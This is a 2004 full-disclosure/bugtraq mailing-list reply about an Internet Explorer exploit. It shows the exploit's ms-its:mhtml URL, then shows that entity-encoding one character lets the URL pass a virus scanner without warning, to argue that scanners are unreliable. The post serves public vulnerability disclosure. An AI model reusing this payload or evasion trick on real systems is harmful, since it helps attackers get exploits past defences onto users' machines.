Date: Tue, 30 Mar 2004 13:00:29 +0200
From: Jelmer <jkuperus@...net.nl>
To: Void <void@...t.net>, full-disclosure@...ts.netsys.com,
   bugtraq@...urityfocus.com
Subject: Re: new internet explorer exploit  (was new worm)

And even that small measure of warning is trivially defeated

if I change the url in my exploit.htm from

ms-its:mhtml:file://C:\foo.mht!${PATH}/EXPLOIT.CHM::/exploit.htm

&#109;s-its:mhtml:file://C:\foo.mht!${PATH}/EXPLOIT.CHM::/exploit.htm

It gives no warning whatsoever, proofing once again that you  shouldn't
solely rely on virus scanners, though others might do a better job, I can't
imagine anyone doing it worse